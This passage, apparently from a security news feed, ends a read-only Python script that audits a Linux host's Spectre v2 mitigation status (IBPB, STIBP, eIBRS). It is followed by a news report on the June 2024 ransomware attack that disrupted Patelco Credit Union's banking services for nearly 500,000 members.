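        findings.append("no enhanced IBRS: cross-privilege isolation relies on retpolines or legacy IBRS")
    if st["ibpb"] == "conditional":
        findings.append("IBPB is conditional: only tasks that opted in via prctl/seccomp get a barrier")
    elif st["ibpb"] == "disabled":
        findings.append("IBPB is disabled: no predictor flush on context switch")
    # In eIBRS mode the kernel omits the STIBP field, so only flag its absence otherwise.
    if st["stibp"] in (None, "disabled") and not eibrs:
        findings.append("STIBP not active: sibling hyperthreads share the indirect predictor")
    return findings


def from_host() -> list:
    """Run the assessment against the live sysfs and cpuinfo files (Linux only)."""
    if not (SPECTRE_V2_SYSFS.exists() and CPUINFO.exists()):
        return ["not a Linux host exposing the sysfs vulnerability interface"]
    return assess(SPECTRE_V2_SYSFS.read_text(), CPUINFO.read_text())


# Constructed examples of the two inputs (retpoline host with conditional IBPB and STIBP).
EXAMPLE_STATUS = "Mitigation: Retpolines; IBPB: conditional; IBRS_FW; STIBP: conditional; RSB filling"
EXAMPLE_CPUINFO = "processor\t: 0\nflags\t\t: fpu vme sse2 ibpb stibp ibrs ssbd\n"

if __name__ == "__main__":
    for finding in assess(EXAMPLE_STATUS, EXAMPLE_CPUINFO):
        print("example:", finding)
    for finding in from_host():
        print("this host:", finding)
```

On Linux the "more aggressive IBPB" the researchers recommend corresponds to booting with `spectre_v2_user=on`, which makes both IBPB and STIBP unconditional at a measurable cost in context-switch latency; the script only reports the state, it does not change it.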

Patelco Credit Union Hit by Ransomware Attack, Disrupting Services for Nearly 500,000 Members

By: Alan J
2 July 2024 at 13:01

Patelco Credit Union

Patelco Credit Union, one of the oldest and largest credit unions in the U.S., fell victim to a ransomware attack on June 29, 2024, forcing the institution to shut down most of its day-to-day banking systems. The attack has affected nearly half a million members across the Bay Area and Northern California, leaving them without access to crucial financial services. The Dublin, California-based credit union disclosed details of the security incident through social media and email communications from President and CEO Erin Mendez. While initial details were scarce, Patelco later confirmed the nature of the attack and its widespread impact on member services.

Scope Of Patelco Credit Union Attack

The ransomware attack has crippled Patelco's online banking platform, mobile app, and call center operations after staff shut down these systems to contain the attack. Members are currently unable to perform electronic transactions such as transfers (including Zelle), direct deposits, balance inquiries, and online bill payments.
[Image: Patelco Credit Union Attack. Source: X.com (@PatelcoPays)]
Debit and credit card transactions are functioning in a limited capacity, while ATM cash withdrawals and deposits remain available at Patelco and shared branch ATMs. The credit union's President and CEO, Erin Mendez, issued a statement on social media Saturday morning, announcing that services were unavailable due to a "serious security incident." An email was sent to members later that day, revealing that the incident was a ransomware attack and confirming that the credit union had shut down its systems to contain and remediate the issue.

Patelco Credit Union Response and Recovery Efforts

In the email shared with Patelco members, Mendez apologized for the inconvenience and assured members that the credit union was working around the clock with third-party cybersecurity professionals to assess the situation and restore services. The credit union has warned members to expect longer than normal wait times at branches and through customer service channels. While the full extent of the attack's impact remains unclear, Patelco has assured members that they can still access cash from ATMs. The credit union has also set up a dedicated webpage for ongoing communications about the incident and system functionality updates. The latest update on the security incident from the dedicated webpage states:
Please know that our team and third-party partners are working around the clock to get back up and running. We are committed to providing transparent and frequent updates to best of our ability as well as the best possible service that we can, given the disruption. We sincerely apologize for the inconvenience that this cyber attack has caused for our members. We anticipate longer than normal wait times and truly appreciate your patience and support during this difficult time.
The website also provides details on the availability of locations, categorizing them as available, limited functionality, and unavailable.
[Image: Availability of Patelco Credit Union locations. Source: www.patelco.org/securityupdate]
The site disclosed that there was no evidence that account information such as account number/member number, or online banking credentials such as mobile and online banking User IDs or passwords, were affected.